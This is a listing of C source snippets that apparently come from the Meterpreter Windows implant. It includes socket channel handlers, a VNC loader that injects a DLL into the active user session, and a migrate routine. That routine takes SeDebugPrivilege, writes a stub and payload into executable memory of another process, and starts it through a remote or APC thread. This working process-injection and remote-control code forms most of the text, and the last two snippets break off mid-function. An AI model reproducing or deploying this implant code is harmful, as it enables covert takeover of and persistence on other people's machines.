示例#1
0
/*
 * Shuts the socket down for either reading or writing based on the how
 * parameter supplied by the remote side
 */
DWORD request_net_socket_tcp_shutdown(Remote *remote, Packet *packet)
{
	DWORD dwResult      = ERROR_SUCCESS;
	Packet * response   = NULL;
	SocketContext * ctx = NULL;
	Channel * channel   = NULL;
	DWORD cid           = 0;
	DWORD how           = 0;

	do
	{
		dprintf( "[TCP] entering request_net_socket_tcp_shutdown" );
		response = packet_create_response( packet );
		if( !response )
			BREAK_WITH_ERROR( "[TCP] request_net_socket_tcp_shutdown. response == NULL", ERROR_NOT_ENOUGH_MEMORY );

		cid = packet_get_tlv_value_uint( packet, TLV_TYPE_CHANNEL_ID );
		how = packet_get_tlv_value_uint( packet, TLV_TYPE_SHUTDOWN_HOW );

		channel = channel_find_by_id( cid );
		if( !response )
			BREAK_WITH_ERROR( "[TCP] request_net_socket_tcp_shutdown. channel == NULL", ERROR_INVALID_HANDLE );

		dprintf( "[TCP] request_net_socket_tcp_shutdown. channel=0x%08X, cid=%d", channel, cid );

		ctx = channel_get_native_io_context( channel );
		if( !ctx )
			BREAK_WITH_ERROR( "[TCP] request_net_socket_tcp_shutdown. ctx == NULL", ERROR_INVALID_HANDLE );

		if( shutdown( ctx->fd, how ) == SOCKET_ERROR )
			BREAK_ON_WSAERROR( "[TCP] request_net_socket_tcp_shutdown. shutdown failed" );

		// sf: we dont seem to need to call this here, as the channels tcp_channel_client_local_notify() will 
		// catch the socket closure and call free_socket_context() for us, due the the FD_READ|FD_CLOSE flags 
		// being passed to WSAEventSelect for the notify event in create_tcp_client_channel().
		// This avoids a double call (from two different threads) and subsequent access violation in some edge cases.
		//free_socket_context( ctx );

	} while( 0 );

	packet_transmit_response( dwResult, remote, response );

	dprintf( "[TCP] leaving request_net_socket_tcp_shutdown" );
	
	return ERROR_SUCCESS;
}
示例#2
0
/*
 * Entry Point.
 */
DWORD Init( SOCKET s )
{
	DWORD dwResult              = ERROR_SUCCESS;
	BOOL bTerminate             = FALSE;
	HANDLE hMessageThread       = NULL;
	DLL_BUFFER VncDllBuffer     = {0};  
	char cCommandLine[MAX_PATH] = {0};
	DWORD dwHostSessionId       = 0;
	DWORD dwActiveSessionId     = 0;
	DWORD dwAgentSessionId      = 0xFFFFFFFF;
	BYTE bFlags                 = 0;

	__try
	{
		do
		{
			// We maintain state for the rfb stream so as not to desynchronize the remote
			// client after session switching and the injection of multiple agents server side.
			context_init();

			sock = s;
			if( sock == INVALID_SOCKET )
				BREAK_WITH_ERROR( "[LOADER] Init. INVALID_SOCKET", ERROR_INVALID_PARAMETER );
			
			if( recv( sock, (char *)&bFlags, 1, 0 ) == SOCKET_ERROR )
				BREAK_ON_WSAERROR( "[LOADER] Init. recv bFlags failed" );

			if( bFlags & VNCFLAG_DISABLECOURTESYSHELL )
				AgentContext.bDisableCourtesyShell = TRUE;

			if( bFlags & VNCFLAG_DISABLESESSIONTRACKING )
				bDisableSessionTracking = TRUE;

			dprintf( "[LOADER] Init. Starting, hAppInstance=0x%08X, sock=%d, bFlags=%d", hAppInstance, sock, bFlags );

			// get the vnc dll we will inject into the active session
			if( loader_vncdll( &VncDllBuffer ) != ERROR_SUCCESS )
				BREAK_ON_ERROR( "[LOADER] Init. loader_vncdll failed" );

			// create a socket event and have it signaled on FD_CLOSE
			hSocketCloseEvent = WSACreateEvent();
			if( hSocketCloseEvent == WSA_INVALID_EVENT )
				BREAK_ON_WSAERROR( "[LOADER] Init. WSACreateEvent failed" );

			if( WSAEventSelect( sock, hSocketCloseEvent, FD_CLOSE ) == SOCKET_ERROR )
				BREAK_ON_WSAERROR( "[LOADER] Init. WSAEventSelect failed" );

			// get the session id that our host process belongs to
			dwHostSessionId = session_id( GetCurrentProcessId() );

			hMessageThread = CreateThread( NULL, 0, context_message_thread, NULL, 0, NULL );
			if( !hMessageThread )
				BREAK_ON_ERROR( "[LOADER] Init. CreateThread context_message_thread failed" );

			// loop untill the remote client closes the connection, creating a vnc
			// server agent inside the active session upon the active session changing
			while( !bTerminate )
			{
				// in case we have been waiting for a session to attach to the physical  
				// console and the remote client has quit, we detect this here...
				if( WaitForSingleObject( hSocketCloseEvent, 0 ) == WAIT_OBJECT_0 )
				{
					dprintf( "[LOADER] Init. Remote socket closed, terminating1..." );
					break;
				}

				// get the session id for the interactive session
				dwActiveSessionId = session_activeid();
			
				// test if there is no session currently attached to the physical console...
				if( dwActiveSessionId == 0xFFFFFFFF )
				{
					dprintf( "[LOADER] Init. no session currently attached to the physical console..." );
					// just try to wait it out...
					Sleep( 250 );
					continue;
				}
				else if( dwActiveSessionId == dwAgentSessionId )
				{
					dprintf( "[LOADER] Init. dwActiveSessionId == dwAgentSessionId..." );
					// just try to wait it out...
					Sleep( 250 );
					continue;
				}

				// do the local process or session injection
				if( dwHostSessionId != dwActiveSessionId )
				{
					dprintf( "[LOADER] Init. Injecting into active session %d...", dwActiveSessionId );
					if( session_inject( dwActiveSessionId, &VncDllBuffer ) != ERROR_SUCCESS )
						BREAK_WITH_ERROR( "[LOADER] Init. session_inject failed", ERROR_ACCESS_DENIED );
				}
				else
				{
					dprintf( "[LOADER] Init. Allready in the active session %d.", dwActiveSessionId );
					if( ps_inject( GetCurrentProcessId(), &VncDllBuffer ) != ERROR_SUCCESS  )
						BREAK_WITH_ERROR( "[LOADER] Init. ps_inject current process failed", ERROR_ACCESS_DENIED );
				}
				
				dwAgentSessionId = dwActiveSessionId;

				// loop, waiting for either the agents process to die, the remote socket to die or
				// the active session to change...
				while( TRUE )
				{
					HANDLE hEvents[2]  = {0};
					DWORD dwWaitResult = 0;

					// wait for these event to be signaled or a timeout to occur...
					hEvents[0]   = hSocketCloseEvent;
					hEvents[1]   = hAgentProcess;
					dwWaitResult = WaitForMultipleObjects( 2, (HANDLE *)&hEvents, FALSE, 250 );
					
					// bail if we have somehow failed (e.g. invalid handle)
					if( dwWaitResult == WAIT_FAILED )
					{
						dprintf( "[LOADER] Init. WaitForMultipleObjects failed." );
						// if we cant synchronize we bail out...
						bTerminate = TRUE;
						break;
					}
					// if we have just timedout, test the current active session...
					else if( dwWaitResult == WAIT_TIMEOUT )
					{
						// if the agent is still in the active session just continue...
						if( dwAgentSessionId == session_activeid() )
							continue;
						// if we are not to perform session tracking try and stay in the current session (as it might become the active input session at a later stage)
						if( bDisableSessionTracking )
						{
							dprintf( "[LOADER] Init. Active session has changed, trying to stay in current session as session tracking disabled..." );
							Sleep( 500 );
							continue;
						}
						// if the agent is no longer in the active session we signal the agent to terminate
						if( !ReleaseMutex( hAgentCloseEvent ) )
							dprintf( "[LOADER] Init. ReleaseMutex 1 hAgentCloseEvent failed. error=%d", GetLastError() );							
						dprintf( "[LOADER] Init. Active session has changed. Moving agent into new session..." );
						dwAgentSessionId = 0xFFFFFFFF;
						// and we go inject a new agent into the new active session (or terminate if session tracking disabled)
						loader_agent_close();
						break;
					}
					// sanity check the result for an abandoned mutex
					else if( (dwWaitResult >= WAIT_ABANDONED_0) && (dwWaitResult <= (WAIT_ABANDONED_0 + 1)) )
					{
						dprintf( "[LOADER] Init. WAIT_ABANDONED_0 for %d", dwWaitResult - WAIT_ABANDONED_0 );
						bTerminate = TRUE;
						break;
					}
					else
					{
						// otherwise if we have an event signaled, handle it
						switch( dwWaitResult - WAIT_OBJECT_0 )
						{
							case 0:
								dprintf( "[LOADER] Init. Remote socket closed, terminating2..." );
								bTerminate = TRUE;
								if( !ReleaseMutex( hAgentCloseEvent ) )
									dprintf( "[LOADER] Init. ReleaseMutex 2 hAgentCloseEvent failed. error=%d", GetLastError() );
								ReleaseMutex( hAgentCloseEvent );
								break;
							case 1:
								dprintf( "[LOADER] Init. Injected agent's process has terminated..." );
								loader_agent_close();
								dwAgentSessionId = 0xFFFFFFFF;
								break;
							default:
								dprintf( "[LOADER] Init. WaitForMultipleObjects returned dwWaitResult=0x%08X", dwWaitResult );
								bTerminate = TRUE;
								if( !ReleaseMutex( hAgentCloseEvent ) )
									dprintf( "[LOADER] Init. ReleaseMutex 3 hAgentCloseEvent failed. error=%d", GetLastError() );
								break;
						}
					}

					// get out of this loop...
					break;
				}

			}

		} while( 0 );
	
		CLOSE_HANDLE( hSocketCloseEvent );

		loader_agent_close();

		closesocket( sock );

		if( hMessageThread )
			TerminateThread( hMessageThread, 0 );
	}
	__except( EXCEPTION_EXECUTE_HANDLER )
	{
		dprintf( "[LOADER] Init. EXCEPTION_EXECUTE_HANDLER\n\n" );
	}

	dprintf( "[LOADER] Init. Finished." );

	return dwResult;
}
示例#3
0
/*
 * A pre injection hook called before our dll has been injected into a process.
 */
DWORD loader_inject_pre( DWORD dwPid, HANDLE hProcess, char * cpCommandLine )
{
	DWORD dwResult               = ERROR_SUCCESS;
	LPVOID lpMemory              = NULL;
	AGENT_CTX RemoteAgentContext = {0};
	int i                        = 0;

	do
	{
		if( !hProcess || !cpCommandLine )
			BREAK_WITH_ERROR( "[LOADER] loader_inject_pre. !hProcess || !cpCommandLine", ERROR_INVALID_PARAMETER );

		// Use User32!WaitForInputIdle to slow things down so if it's a new
		// process (like a new winlogon.exe) it can have a chance to initilize...
		// Bad things happen if we inject into an uninitilized process.
		WaitForInputIdle( hProcess, 10000 );

		CLOSE_HANDLE( hAgentCloseEvent );
		CLOSE_HANDLE( hAgentProcess );

		memcpy( &RemoteAgentContext, &AgentContext, sizeof(AGENT_CTX) );

		hAgentCloseEvent = CreateMutex( NULL, TRUE, NULL );
		if( !hAgentCloseEvent )
			BREAK_ON_ERROR( "[LOADER] loader_inject_pre. CreateEvent hAgentCloseEvent failed" );

		if( !DuplicateHandle( GetCurrentProcess(), hAgentCloseEvent, hProcess, &RemoteAgentContext.hCloseEvent, 0, FALSE, DUPLICATE_SAME_ACCESS ) )
			BREAK_ON_ERROR( "[LOADER] loader_inject_pre. DuplicateHandle hAgentCloseEvent failed" )
		
		dprintf( "[LOADER] WSADuplicateSocket for sock=%d", sock );

		// Duplicate the socket for the target process
		if( WSADuplicateSocket( sock, dwPid, &RemoteAgentContext.info ) != NO_ERROR )
			BREAK_ON_WSAERROR( "[LOADER] WSADuplicateSocket failed" )
	
		// Allocate memory for the migrate stub, context and payload
		lpMemory = VirtualAllocEx( hProcess, NULL, sizeof(AGENT_CTX), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE );
		if( !lpMemory )
			BREAK_ON_ERROR( "[LOADER] VirtualAllocEx failed" )
		
		/*for( i=0 ; i<4 ; i++ )
		{
			DWORD dwSize = 0;

			if( !AgentContext.dictionaries[i] )
				continue;
			
			dwSize = ( sizeof(DICTMSG) + AgentContext.dictionaries[i]->dwDictLength );

			RemoteAgentContext.dictionaries[i] = VirtualAllocEx( hProcess, NULL, dwSize, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE );
			if( !RemoteAgentContext.dictionaries[i] )
				continue;

			if( !WriteProcessMemory( hProcess, RemoteAgentContext.dictionaries[i], AgentContext.dictionaries[i], dwSize, NULL ) )
				RemoteAgentContext.dictionaries[i] = NULL;
		}*/

		// Write the ctx to memory...
		if( !WriteProcessMemory( hProcess, lpMemory, &RemoteAgentContext, sizeof(AGENT_CTX), NULL ) )
			BREAK_ON_ERROR( "[MIGRATE] WriteProcessMemory 1 failed" )

		hAgentProcess = hProcess;

		_snprintf( cpCommandLine, COMMANDLINE_LENGTH, "/v /c:0x%08X", lpMemory );

	} while( 0 );

	if( dwResult != ERROR_SUCCESS )
	{
		dprintf( "[LOADER] loader_inject_pre. CLOSE_HANDLE( hAgentCloseEvent );" );
		CLOSE_HANDLE( hAgentCloseEvent );
	}

	return dwResult;
}
示例#4
0
/*!
 * @brief Allocates a streaming TCP server channel.
 * @param remote Pointer to the remote instance.
 * @param packet Pointer to the request packet.
 * @returns Indication of success or failure.
 * @retval ERROR_SUCCESS Opening the server channel completed successfully.
 */
DWORD request_net_tcp_server_channel_open(Remote * remote, Packet * packet)
{
    DWORD dwResult = ERROR_SUCCESS;
    TcpServerContext * ctx = NULL;
    Packet * response = NULL;
    char * localHost = NULL;
    StreamChannelOps chops = { 0 };
    USHORT localPort = 0;
    BOOL v4Fallback = FALSE;

    do
    {
        response = packet_create_response(packet);
        if (!response)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. response == NULL", ERROR_NOT_ENOUGH_MEMORY);
        }

        ctx = (TcpServerContext *)malloc(sizeof(TcpServerContext));
        if (!ctx)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. ctx == NULL", ERROR_NOT_ENOUGH_MEMORY);
        }

        memset(ctx, 0, sizeof(TcpServerContext));

        ctx->remote = remote;

        localPort = (USHORT)(packet_get_tlv_value_uint(packet, TLV_TYPE_LOCAL_PORT) & 0xFFFF);
        if (!localPort)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. localPort == NULL", ERROR_INVALID_HANDLE);
        }

        localHost = packet_get_tlv_value_string(packet, TLV_TYPE_LOCAL_HOST);

        ctx->fd = WSASocket(AF_INET6, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
        if (ctx->fd == INVALID_SOCKET)
        {
            v4Fallback = TRUE;
        }
        else
        {
            int no = 0;
            if (setsockopt(ctx->fd, IPPROTO_IPV6, IPV6_V6ONLY, (char*)&no, sizeof(no)) == SOCKET_ERROR)
            {
                // fallback to ipv4 - we're probably running on Windows XP or earlier here, which means that to
                // support IPv4 and IPv6 we'd need to create two separate sockets. IPv6 on XP isn't that common
                // so instead, we'll just revert back to v4 and listen on that one address instead.
                closesocket(ctx->fd);
                v4Fallback = TRUE;
            }
        }

        struct sockaddr_in6 sockAddr = { 0 };
        DWORD sockAddrSize = 0;

        if (v4Fallback)
        {
            struct sockaddr_in* v4Addr = (struct sockaddr_in*)&sockAddr;
            v4Addr->sin_addr.s_addr = localHost == NULL ? htons(INADDR_ANY) : inet_addr(localHost);
            v4Addr->sin_family = AF_INET;
            v4Addr->sin_port = htons(localPort);
            sockAddrSize = sizeof(struct sockaddr_in);
        }
        else
        {
            // TODO: add IPv6 address binding support
            sockAddr.sin6_addr = in6addr_any;
            sockAddr.sin6_family = AF_INET6;
            sockAddr.sin6_port = htons(localPort);
            sockAddrSize = sizeof(struct sockaddr_in6);
        }

        if (bind(ctx->fd, (SOCKADDR *)&sockAddr, sockAddrSize) == SOCKET_ERROR)
        {
            BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. bind failed");
        }

        if (listen(ctx->fd, SOMAXCONN) == SOCKET_ERROR)
        {
            BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. listen failed");
        }

        ctx->notify = WSACreateEvent();
        if (ctx->notify == WSA_INVALID_EVENT)
        {
            BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. WSACreateEvent failed");
        }

        if (WSAEventSelect(ctx->fd, ctx->notify, FD_ACCEPT) == SOCKET_ERROR)
        {
            BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. WSAEventSelect failed");
        }

        ctx->ipv6 = !v4Fallback;

        memset(&chops, 0, sizeof(StreamChannelOps));
        chops.native.context = ctx;
        chops.native.close = tcp_channel_server_close;

        ctx->channel = channel_create_stream(0, CHANNEL_FLAG_SYNCHRONOUS, &chops);
        if (!ctx->channel)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. channel_create_stream failed", ERROR_INVALID_HANDLE);
        }

        scheduler_insert_waitable(ctx->notify, ctx, NULL, (WaitableNotifyRoutine)tcp_channel_server_notify, NULL);

        packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channel_get_id(ctx->channel));

        dprintf("[TCP-SERVER] request_net_tcp_server_channel_open. tcp server %s:%d on channel %d", localHost, localPort, channel_get_id(ctx->channel));

    } while (0);

    packet_transmit_response(dwResult, remote, response);

    do
    {
        if (dwResult == ERROR_SUCCESS)
        {
            break;
        }

        dprintf("[TCP-SERVER] Error encountered %u 0x%x", dwResult, dwResult);

        if (!ctx)
        {
            break;
        }

        if (ctx->fd)
        {
            dprintf("[TCP-SERVER] Destroying socket");
            closesocket(ctx->fd);
        }

        if (ctx->channel)
        {
            dprintf("[TCP-SERVER] Destroying channel");
            channel_destroy(ctx->channel, packet);
        }

        free(ctx);

    } while (0);

    return dwResult;
}
示例#5
0
/*!
 * @brief Notify routine for a tcp server channel to pick up its new client connections..
 * @param remote Pointer to the remote instance.
 * @param serverCtx Pointer to the TCP server context.
 * @returns Indication of success or failure.
 * @retval ERROR_SUCCESS Notification completed successfully.
 */
DWORD tcp_channel_server_notify(Remote * remote, TcpServerContext * serverCtx)
{
    DWORD dwResult = ERROR_SUCCESS;
    TcpClientContext* clientctx = NULL;
    Packet* request = NULL;
    SOCKADDR_IN6 clientaddr = { 0 };
    SOCKADDR_IN6 serveraddr = { 0 };
    SOCKET sock = 0;
    DWORD size = 0;
    char* localhost = NULL;
    char* peerhost = NULL;
    int localport = 0;
    int peerport = 0;

    do
    {
        if (!serverCtx)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] tcp_channel_server_notify. serverCtx == NULL", ERROR_INVALID_HANDLE);
        }

        ResetEvent(serverCtx->notify);

        size = sizeof(SOCKADDR_IN6);

        sock = accept(serverCtx->fd, (SOCKADDR*)&clientaddr, &size);
        if (sock == INVALID_SOCKET)
        {
            if (WSAGetLastError() == WSAEWOULDBLOCK)
            {
                Sleep(100);
                break;
            }

            BREAK_ON_WSAERROR("[TCP-SERVER] tcp_channel_server_notify. accept failed");
        }

        dprintf("[TCP-SERVER] tcp_channel_server_notify. Got new client connection on channel %d. sock=%d", channel_get_id(serverCtx->channel), sock);

        clientctx = tcp_channel_server_create_client(serverCtx, sock);
        if (!clientctx)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] tcp_channel_server_notify. clientctx == NULL", ERROR_INVALID_HANDLE);
        }

        size = sizeof(SOCKADDR_IN6);

        if (getsockname(serverCtx->fd, (SOCKADDR *)&serveraddr, &size) == SOCKET_ERROR)
        {
            BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. getsockname failed");
        }

        if (!serverCtx->ipv6)
        {
            localhost = inet_ntoa(((SOCKADDR_IN*)&serveraddr)->sin_addr);
        }

        if (!localhost)
        {
            localhost = "";
        }

        localport = ntohs(serverCtx->ipv6 ? serveraddr.sin6_port : ((SOCKADDR_IN*)&serveraddr)->sin_port);

        if (!serverCtx->ipv6)
        {
            peerhost = inet_ntoa(((SOCKADDR_IN*)&clientaddr)->sin_addr);
        }

        if (!peerhost)
        {
            peerhost = "";
        }

        peerport = ntohs(serverCtx->ipv6 ? clientaddr.sin6_port : ((SOCKADDR_IN*)&clientaddr)->sin_port);

        dprintf("[TCP-SERVER] tcp_channel_server_notify. New connection %s:%d <- %s:%d", localhost, localport, peerhost, peerport);

        request = packet_create(PACKET_TLV_TYPE_REQUEST, "tcp_channel_open");
        if (!request)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. packet_create failed", ERROR_INVALID_HANDLE);
        }

        packet_add_tlv_uint(request, TLV_TYPE_CHANNEL_ID, channel_get_id(clientctx->channel));
        packet_add_tlv_uint(request, TLV_TYPE_CHANNEL_PARENTID, channel_get_id(serverCtx->channel));
        packet_add_tlv_string(request, TLV_TYPE_LOCAL_HOST, localhost);
        packet_add_tlv_uint(request, TLV_TYPE_LOCAL_PORT, localport);
        packet_add_tlv_string(request, TLV_TYPE_PEER_HOST, peerhost);
        packet_add_tlv_uint(request, TLV_TYPE_PEER_PORT, peerport);

        dwResult = PACKET_TRANSMIT(serverCtx->remote, request, NULL);

    } while (0);

    return dwResult;
}
示例#6
0
/*!
 * @brief Create a TCP client channel from a socket.
 * @param serverCtx Pointer to the TCP server context.
 * @param sock The socket handle.
 * @returns Pointer to the newly created client context.
 */
TcpClientContext * tcp_channel_server_create_client(TcpServerContext * serverCtx, SOCKET sock)
{
    DWORD dwResult = ERROR_SUCCESS;
    TcpClientContext * clientctx = NULL;
    StreamChannelOps chops = { 0 };

    do
    {
        if (!serverCtx)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] tcp_channel_server_create_client. serverCtx == NULL", ERROR_INVALID_HANDLE);
        }

        clientctx = (TcpClientContext *)malloc(sizeof(TcpClientContext));
        if (!clientctx)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] tcp_channel_server_create_client. clientctx == NULL", ERROR_NOT_ENOUGH_MEMORY);
        }

        memset(clientctx, 0, sizeof(TcpClientContext));

        clientctx->remote = serverCtx->remote;
        clientctx->fd = sock;

        clientctx->notify = WSACreateEvent();
        if (clientctx->notify == WSA_INVALID_EVENT)
        {
            BREAK_ON_WSAERROR("[TCP-SERVER] tcp_channel_server_create_client. WSACreateEvent failed");
        }

        if (WSAEventSelect(clientctx->fd, clientctx->notify, FD_READ | FD_CLOSE) == SOCKET_ERROR)
        {
            BREAK_ON_WSAERROR("[TCP-SERVER] tcp_channel_server_create_client. WSAEventSelect failed");
        }

        memset(&chops, 0, sizeof(StreamChannelOps));

        chops.native.context = clientctx;
        chops.native.write = tcp_channel_client_write;
        chops.native.close = tcp_channel_client_close;

        clientctx->channel = channel_create_stream(0, 0, &chops);
        if (!clientctx->channel)
        {
            BREAK_WITH_ERROR("[TCP-SERVER] tcp_channel_server_create_client. clientctx->channel == NULL", ERROR_INVALID_HANDLE);
        }

        dwResult = scheduler_insert_waitable(clientctx->notify, clientctx, NULL, (WaitableNotifyRoutine)tcp_channel_client_local_notify, NULL);

    } while (0);

    if (dwResult != ERROR_SUCCESS)
    {
        if (clientctx)
        {
            free(clientctx);
            clientctx = NULL;
        }
    }

    return clientctx;
}
示例#7
0
/*!
 * @brief Migrate the meterpreter server from the current process into another process.
 * @param remote Pointer to the \c Remote instance.
 * @param packet Pointer to the request packet.
 * @param pResult Pointer to the memory that will receive the result.
 * @returns Indication of whether the server should continue processing or not.
 */
BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResult)
{
	DWORD dwResult = ERROR_SUCCESS;
	Packet * response = NULL;
	HANDLE hToken = NULL;
	HANDLE hProcess = NULL;
	HANDLE hEvent = NULL;
	BYTE * lpPayloadBuffer = NULL;
	LPVOID lpMigrateStub = NULL;
	LPBYTE lpMemory = NULL;
	MIGRATECONTEXT ctx = { 0 };
	DWORD dwMigrateStubLength = 0;
	DWORD dwPayloadLength = 0;
	DWORD dwProcessID = 0;
	DWORD dwDestinationArch = 0;

	MetsrvConfig* config = NULL;
	DWORD configSize = 0;

	do
	{
		response = packet_create_response(packet);
		if (!response)
		{
			dwResult = ERROR_NOT_ENOUGH_MEMORY;
			break;
		}

		// Get the process identifier to inject into
		dwProcessID = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_PID);

		// Get the target process architecture to inject into
		dwDestinationArch = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_ARCH);

		// Get the length of the payload buffer
		dwPayloadLength = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_LEN);

		// Receive the actual migration payload buffer
		lpPayloadBuffer = packet_get_tlv_value_string(packet, TLV_TYPE_MIGRATE_PAYLOAD);

		dprintf("[MIGRATE] Attempting to migrate. ProcessID=%d, Arch=%s, PayloadLength=%d", dwProcessID, (dwDestinationArch == 2 ? "x64" : "x86"), dwPayloadLength);

		// If we can, get SeDebugPrivilege...
		if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
		{
			TOKEN_PRIVILEGES priv = { 0 };

			priv.PrivilegeCount = 1;
			priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

			if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid))
			{
				if (AdjustTokenPrivileges(hToken, FALSE, &priv, 0, NULL, NULL));
				{
					dprintf("[MIGRATE] Got SeDebugPrivilege!");
				}
			}

			CloseHandle(hToken);
		}

		// Open the process so that we can migrate into it
		hProcess = OpenProcess(PROCESS_DUP_HANDLE | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcessID);
		if (!hProcess)
		{
			BREAK_ON_ERROR("[MIGRATE] OpenProcess failed")
		}

		// get the existing configuration
		dprintf("[MIGRATE] creating the configuration block");
		remote->config_create(remote, &config, &configSize);
		dprintf("[MIGRATE] Config of %u bytes stashed at 0x%p", configSize, config);

		if (config->session.comms_fd)
		{
			// Duplicate the socket for the target process if we are SSL based
			if (WSADuplicateSocket(config->session.comms_fd, dwProcessID, &ctx.info) != NO_ERROR)
			{
				BREAK_ON_WSAERROR("[MIGRATE] WSADuplicateSocket failed")
			}
		}

		// Create a notification event that we'll use to know when it's safe to exit 
		// (once the socket has been referenced in the other process)
		hEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
		if (!hEvent)
		{
			BREAK_ON_ERROR("[MIGRATE] CreateEvent failed")
		}

		// Duplicate the event handle for the target process
		if (!DuplicateHandle(GetCurrentProcess(), hEvent, hProcess, &ctx.e.hEvent, 0, TRUE, DUPLICATE_SAME_ACCESS))
		{
			BREAK_ON_ERROR("[MIGRATE] DuplicateHandle failed")
		}

		// Get the architecture specific process migration stub...
		if (dwDestinationArch == PROCESS_ARCH_X86)
		{
			lpMigrateStub = (LPVOID)&migrate_stub_x86;
			dwMigrateStubLength = sizeof(migrate_stub_x86);
		}
		else if (dwDestinationArch == PROCESS_ARCH_X64)
		{
			lpMigrateStub = (LPVOID)&migrate_stub_x64;
			dwMigrateStubLength = sizeof(migrate_stub_x64);
		}
		else
		{
			SetLastError(ERROR_BAD_ENVIRONMENT);
			dprintf("[MIGRATE] Invalid target architecture: %u", dwDestinationArch);
			break;
		}

		// Allocate memory for the migrate stub, context, payload and configuration block
		lpMemory = (LPBYTE)VirtualAllocEx(hProcess, NULL, dwMigrateStubLength + sizeof(MIGRATECONTEXT) + dwPayloadLength + configSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		if (!lpMemory)
		{
			BREAK_ON_ERROR("[MIGRATE] VirtualAllocEx failed")
		}

		// Calculate the address of the payload...
		ctx.p.lpPayload = lpMemory + dwMigrateStubLength + sizeof(MIGRATECONTEXT);

		// Write the migrate stub to memory...
		dprintf("[MIGRATE] Migrate stub: 0x%p -> %u bytes", lpMemory, dwMigrateStubLength);
		if (!WriteProcessMemory(hProcess, lpMemory, lpMigrateStub, dwMigrateStubLength, NULL))
		{
			BREAK_ON_ERROR("[MIGRATE] WriteProcessMemory 1 failed")
		}

		// Write the migrate context to memory...
		dprintf("[MIGRATE] Migrate context: 0x%p -> %u bytes", lpMemory + dwMigrateStubLength, sizeof(MIGRATECONTEXT));
		if (!WriteProcessMemory(hProcess, lpMemory + dwMigrateStubLength, &ctx, sizeof(MIGRATECONTEXT), NULL))
		{
			BREAK_ON_ERROR("[MIGRATE] WriteProcessMemory 2 failed")
		}

		// Write the migrate payload to memory...
		dprintf("[MIGRATE] Migrate payload: 0x%p -> %u bytes", ctx.p.lpPayload, dwPayloadLength);
		if (!WriteProcessMemory(hProcess, ctx.p.lpPayload, lpPayloadBuffer, dwPayloadLength, NULL))
		{
			BREAK_ON_ERROR("[MIGRATE] WriteProcessMemory 3 failed")
		}

		// finally write the configuration stub
		dprintf("[MIGRATE] Configuration: 0x%p -> %u bytes", ctx.p.lpPayload + dwPayloadLength, configSize);
		if (!WriteProcessMemory(hProcess, ctx.p.lpPayload + dwPayloadLength, config, configSize, NULL))
		{
			BREAK_ON_ERROR("[MIGRATE] WriteProcessMemory 4 failed")
		}

		// First we try to migrate by directly creating a remote thread in the target process
		if (inject_via_remotethread(remote, response, hProcess, dwDestinationArch, lpMemory, lpMemory + dwMigrateStubLength) != ERROR_SUCCESS)
		{
			dprintf("[MIGRATE] inject_via_remotethread failed, trying inject_via_apcthread...");

			// If that fails we can try to migrate via a queued APC in the target process
			if (inject_via_apcthread(remote, response, hProcess, dwProcessID, dwDestinationArch, lpMemory, lpMemory + dwMigrateStubLength) != ERROR_SUCCESS)
			{
				BREAK_ON_ERROR("[MIGRATE] inject_via_apcthread failed")
			}
		}

		dwResult = ERROR_SUCCESS;

	} while (0);
示例#8
0
/*
 * Create a new UDP socket channel, optionally bound to a local address/port and optionaly specify 
 * a remote peer host/port for future writes.
 */
DWORD request_net_udp_channel_open( Remote * remote, Packet * packet )
{
	DWORD dwResult           = ERROR_SUCCESS;
	UdpClientContext * ctx   = NULL;
	Packet * response        = NULL;
	char * lhost             = NULL;
	char * phost             = NULL;
	SOCKADDR_IN saddr        = {0};
	DatagramChannelOps chops = {0};

	do
	{
		response = packet_create_response( packet );
		if( !response )
			BREAK_WITH_ERROR( "[UDP] request_net_udp_channel_open. response == NULL", ERROR_NOT_ENOUGH_MEMORY );
		
		ctx = (UdpClientContext *)malloc( sizeof(UdpClientContext) );
		if( !ctx )
			BREAK_WITH_ERROR( "[UDP] request_net_udp_channel_open. ctx == NULL", ERROR_NOT_ENOUGH_MEMORY );

		memset( ctx, 0, sizeof(UdpClientContext) );
		
		ctx->sock.remote = remote;

		ctx->localport = (USHORT)( packet_get_tlv_value_uint( packet, TLV_TYPE_LOCAL_PORT ) & 0xFFFF );
		if( !ctx->localport )
			ctx->localport = 0;

		ctx->peerport = (USHORT)( packet_get_tlv_value_uint( packet, TLV_TYPE_PEER_PORT ) & 0xFFFF );
		if( !ctx->peerport )
			ctx->peerport = 0;

		lhost = packet_get_tlv_value_string( packet, TLV_TYPE_LOCAL_HOST );
		if( lhost )
			ctx->localhost.s_addr = inet_addr( lhost );
		else
